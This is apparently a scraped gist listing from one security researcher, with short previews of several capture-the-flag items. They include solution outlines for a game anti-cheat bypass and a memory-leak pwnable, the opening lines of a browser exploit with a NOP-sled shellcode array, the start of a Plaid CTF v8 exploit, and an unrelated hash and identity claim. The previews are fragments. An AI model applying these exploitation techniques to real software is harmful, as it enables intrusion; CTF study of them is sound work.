300 point
Web
Andrew Fasano
This challenge can be solved by exploiting the time change from EDT to EST that will happen on Nov 6.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This challenge required that you write cheats for a minecraft clone to bypass a large wall | |
| There are tons of ways to solve this, but here was the main idea. | |
| - There was a function that would on the client side return if a player has certain privileges. | |
| - Most of these were checked by the server as well, with the exception of fly and noclip (and speed walk to an extent) | |
| o Also note, I didn't modify the server to ignore these, Minetest servers just do ¯\_(ツ)_/¯ | |
| - You can patch this function to return true, and the client can now toggle these abilities. | |
| However the binary had extra anti-cheat built in |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This challenge was a source only pwnable based on a aliasing bug with -O2. Also not all the source code was given. | |
| Intended solution outline: | |
| - In the source in assignVotes, a voter and a candidate can become aliased, and -02 optimization causes an incorrect return value. | |
| o If the person is the same as the candidate, it sets the voteMessage to a constant string, which should change votesToGive as well, but the return is incorrect, so it instead returns the original votesToGive value. | |
| o Then when going to print the error message, it instead tries print the votes (if it is > than the address of main) | |
| o This will print what ever point is given, allowing memory to be leaked up to a null | |
| - Now with an arbitrary read, we can dump the binary and reverse the missing code. | |
| - We can also leak libc addresses and dump libc (or take it from some other challenge) |
itszn
/ gist:5c6030addaecd041af522a77975e986d
Created
December 21, 2016 20:27
Super fast hex encoding
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from timeit import timeit | |
| from ctypes import * | |
| ''' | |
| libc = CDLL('libc.so.6') | |
| libc.mprotect(0x400000,0x1000,7) | |
| s = "e810000000303132333435363738394142434445465b803f007437c6065c48ffc6c6067848ffc68a074825ff00000048c1e8044801d88a00880648ffc68a074883e00f4801d88a00880648ffc648ffc7ebc4c3".decode('hex') | |
| #s = "\xc3" | |
| libc.memcpy(0x400000, c_char_p(s),len(s)) |
I hereby claim:
- I am itszn on github.
- I am itszn (https://keybase.io/itszn) on keybase.
- I have a public key ASAk2FcK4Zc6VAbULYP0m6uMVMTTBV1Cjr5QEL-4YsLlzgo
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from binaryninja import (Architecture, RegisterInfo, InstructionInfo, | |
| InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext, | |
| BranchType, | |
| LowLevelILOperation, LLIL_TEMP, | |
| LowLevelILLabel, | |
| FlagRole, | |
| LowLevelILFlagCondition, | |
| log_error, | |
| CallingConvention, | |
| interaction, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } } | |
| var sc = []; | |
| for (var i=0; i<0x480; i++) { | |
| sc.push(0x90); | |
| } | |
| //sc.push(0xcc); | |
| //sc.push(0xeb); | |
| //sc.push(0xfe); |
itszn
/ gist:0eaac8657401d08f3b9d25ffc87875d7
Created
February 26, 2018 17:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */ | |
| /* ### Utils, thanks saelo ### */ | |
| // | |
| // Tiny module that provides big (64bit) integers. | |
| // | |
| // Copyright (c) 2016 Samuel Groß | |
| // |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Load Int library, thanks saelo! | |
| load('util.js'); | |
| load('int64.js'); | |
| // Helpers to convert from float to in a few random places | |
| var conva = new ArrayBuffer(8); | |
| var convf = new Float64Array(conva); | |
| var convi = new Uint32Array(conva); | |
| var convi8 = new Uint8Array(conva); |
OlderNewer